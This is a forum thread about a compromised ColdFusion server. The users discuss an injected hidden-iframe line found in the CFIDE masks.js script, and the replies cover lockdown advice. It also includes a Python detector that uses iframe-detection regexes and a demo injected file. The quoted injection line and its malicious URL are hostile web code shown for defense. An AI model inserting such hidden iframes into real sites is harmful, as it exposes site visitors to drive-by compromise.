
CFIDE/scripts/masks.js Compromised

New Here, Sep 03, 2013

We just found an injection at the end of masks.js

Here is the content that was added:

"document.write("<iframe width='1' height='0' src='http://top12.oufm.info/'></iframe>");"

Not sure what to make of it. We have a very cryptic password known only to 2 people. Hacking the server would be pretty difficult, so I assume somehow hacking into CFIDE was the issue. Anybody seen anything similar?

It must have happened August 31, 2013

We are using CF 9.02 with ....lib/updates/hf902-00003.jar

Thanks for any feedback and advice on how to prevent another one.

Rob

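The symptom in the post, a hidden iframe appended to a shipped library file, is easy to check for mechanically. The following is an added example (not the poster's code or anything from the ColdFusion distribution): it compares each .js file under a scripts directory with a hash baseline taken from a clean install and flags any document.write() that emits a 1x0 iframe. The demo() files, names and the placeholder URL are constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# document.write() emitting an <iframe ...>; group 1 captures the tag attributes.
IFRAME_WRITE_RE = re.compile(r"document\.write\(\s*[\"']\s*<iframe\b([^>]*)>", re.IGNORECASE)
DIM_RE = re.compile(r"\b(width|height)\s*=\s*['\"]?(\d+)", re.IGNORECASE)


def find_injections(js_text: str) -> list[tuple[str, bool]]:
    """Return (fragment, is_hidden) for every iframe written via document.write."""
    hits = []
    for m in IFRAME_WRITE_RE.finditer(js_text):
        dims = {k.lower(): int(v) for k, v in DIM_RE.findall(m.group(1))}
        hidden = any(dims.get(d, 100) <= 1 for d in ("width", "height"))  # 1x0 frame
        hits.append((m.group(0), hidden))
    return hits


def sha256_of(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def audit_scripts(scripts_dir: Path, baseline: dict[str, str]) -> dict[str, list[str]]:
    """Flag .js files whose hash differs from the clean-install baseline or that write iframes."""
    findings: dict[str, list[str]] = {}
    for js in sorted(scripts_dir.rglob("*.js")):
        rel = js.relative_to(scripts_dir).as_posix()
        text = js.read_text(encoding="utf-8", errors="replace")
        reasons = []
        if rel not in baseline:
            reasons.append("not in baseline (unexpected file)")
        elif baseline[rel] != sha256_of(text):
            reasons.append("hash differs from clean-install baseline")
        for frag, hidden in find_injections(text):
            reasons.append(f"{'hidden' if hidden else 'visible'} iframe via document.write: {frag[:70]}")
        if reasons:
            findings[rel] = reasons
    return findings


def demo() -> dict[str, list[str]]:
    """Constructed sample: a clean library file and a copy with an injection appended,
    shaped like the one in the post (the URL is a placeholder, not the real one)."""
    clean = "function applyMask(v){return v;}\n"
    injected = clean + "document.write(\"<iframe width='1' height='0' src='http://injected.invalid/'></iframe>\");\n"
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "masks.js").write_text(injected, encoding="utf-8")
        (root / "cfform.js").write_text(clean, encoding="utf-8")
        baseline = {"masks.js": sha256_of(clean), "cfform.js": sha256_of(clean)}
        return audit_scripts(root, baseline)
```

On a real server the baseline would be built once from a freshly installed CFIDE/scripts and the audit run on a schedule, so a re-injection is noticed the day it happens rather than days later.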
Adobe Employee, Sep 03, 2013

Hello XeeMe2,

Thank you for your post. Have you followed the LockDown guide for blocking CFIDE requests? Here is the link: http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-...

Regards,

Anit Kumar

Advocate, Sep 03, 2013

There are various threads on this and similar CFIDE vulnerabilities. Make sure you are at the latest patch/hotfix level. Also for your web facing sites, I always recommend pointing your "cfide" virtual directory to an empty directory and then adding a "scripts" virtual directory under it that points back to the original cfide/scripts location. This fixes most CFIDE vulnerabilities.

New Here, Sep 03, 2013

Thanks Anit, appreciate it. Yes, we saw it but felt it is not really helping, as the CFIDE will need to be accessible virtually somehow. Also, it looked like a huge act for just a little improvement.

Steve, thanks a lot for your comment. Do you have a more detailed description somewhere? Not sure how to do what you suggested.

Thanks

Rob

Enthusiast, Sep 03, 2013

Would making all of the /CFIDE folder have basic authentication, for example, stop such an attack?

Adobe Employee, Sep 03, 2013

Please refer to the Block /CFIDE requests section of the LockDown Guide (http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-...).

And refer to the "Set up a virtual directory alias for /CFIDE/scripts" section for CFIDE/Scripts in the same guide.

Hope this answers your query.

Regards,

Anit Kumar

Enthusiast, Sep 04, 2013

Anit, I've read the lockdown guide, but can you also please confirm that putting authentication on the CFIDE folder will also stop such attacks? Or is this not a good idea? If not, why?

Advocate, Sep 04, 2013

It might fix your immediate problem, but you will still need to allow anonymous access to the /cfide/scripts directory. To me this route would just open up another attack vector for a would-be evildoer. Now they could start directly attacking your OS users via accessing the cfide directory.

Enthusiast, Sep 05, 2013

Steve, thanks for the reply. Can anonymous access rights still be granted to CFIDE but with authentication enabled? Does putting authentication on CFIDE cause any problems?
